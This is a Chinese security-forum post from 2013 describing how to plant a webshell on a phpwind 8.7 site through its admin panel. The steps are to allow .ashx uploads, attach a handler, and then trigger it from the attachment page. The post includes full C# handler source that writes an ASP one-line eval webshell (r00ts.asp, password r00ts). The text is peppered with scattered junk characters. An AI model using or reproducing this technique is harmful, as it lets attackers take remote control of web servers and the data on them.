找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2215|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小  r* K- H* d1 p0 g
3 T. U' z& `: A4 l
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx3 o" b( Q  P& z6 a% u7 p' \
' A) p: x/ B1 t+ o
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
7 d( L9 Q) W, m3 c' Q
# Q7 J* N9 U+ e8 H; ]- f; }8 s- s8 I然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx7 J' N6 u& [6 m) v* f

' ~) Z( |4 k' y打开之后空白 会在目录底下生成r00ts.asp 密码r00ts) T! g5 e: @& s  Y
- X2 [! N; P) m2 \0 ~
下面是代码:
0 I/ v2 l: ]; k1 [, l! U
8 ^) m0 Q" J9 v7 Y3 o/ m<%@ WebHandler Language="C#"Class="Handler" %>
$ I, X' X2 l( w/ t, S( Qusing System;
! w& e9 U% `% Fusing System.Web;4 V  ~6 ]) e# G8 ~4 G8 x% D
using System.IO;
4 k" ?  |0 I# Dpublic class Handler : IHttpHandler {5 b$ ?. H2 B3 g) w* J* U
public void ProcessRequest (HttpContext context) {1 `& t5 \. W- G
context.Response.ContentType = "text/plain";
9 C* {$ J8 {: `6 y, j  N% E, ]StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
( d8 [$ F! h% ^5 w+ I2 n1 T+ s) yfile1.Write("<%eval request(\"r00ts\")%>");
' q0 e6 H9 s. i. n: T5 R4 @file1.Flush();6 C* t7 e. ?6 T, c7 f) X! r
file1.Close();; q1 S( P# o0 H8 v1 f! v" z
}
2 i6 W+ ]  h& Y1 K+ p* I% ?public bool IsReusable {
, [( u$ X0 q3 j- m* m& ~2 K$ oget {
" e+ _( _* h+ U& N2 xreturn false;8 b4 m2 c4 ~) b8 q
}0 u3 H8 B! U, g8 j/ Y3 M7 r
}& @5 |4 l6 g) l  }) P
}
4 V  U3 s5 b5 c5 {7 A$ e/ P: ]7 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表